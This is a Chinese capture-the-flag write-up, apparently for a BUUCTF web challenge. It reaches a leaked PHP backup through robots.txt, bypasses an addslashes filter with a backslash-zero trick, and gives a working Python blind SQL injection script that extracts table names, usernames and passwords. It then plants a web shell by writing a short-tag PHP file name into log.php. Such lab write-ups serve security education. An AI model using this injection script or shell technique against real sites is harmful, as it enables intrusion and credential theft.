通过robots.txt文件找到应该有备份文件,
查看源码有
打开image.php.bak,有源码文件,而且php后面又id参数,可能会有sql注入。
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
审计源码,发现一共获取了两个参数,id和path,这里有过滤。
import requests
url = "http://28a7dd21-a562-43c0-9ea7-7e58787b89b9.node3.buuoj.cn/image.php"
#查表
payload1="?id=\\0&path=or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}%23"
#查列
payload2="?id=\\0&path=or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))>{}%23"
#查用户名
payload3="?id=\\0&path=or ascii(substr((select group_concat(username) from users),{},1))>{}%23"
#查密码
payload4="?id=\\0&path=or ascii(substr((select group_concat(password) from users),{},1))>{}%23"
result=""
for i in range(1, 10000):
low = 32
high = 128
mid = (low + high) >> 1
while (low < high):
#payload = payload1.format(i, mid) # images,users
#payload = payload2.format(i, mid) # username, password
#payload = payload3.format(i, mid) # admin
payload = payload4.format(i, mid) # dc268983c380339547ce
new_url = url + payload
response = requests.get(new_url)
if "JFIF" in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) >> 1
if (mid == 32 or mid == 132):
break
result += chr(mid)
print(result)
我们获取到用户名密码后登录,登录之后发现是一个
我上传了一个图片马,然后显示
看到这里会将上传的内容记录到一个log.php中,打开这个php文件看一下,
这里会将上传的文件名写入这个php文件中,那我们将文件名写入这个php文件中,就可以连接蚁剑了。文件名进行了php/i过滤,可以考虑短标签绕过,
到根目录读取flag。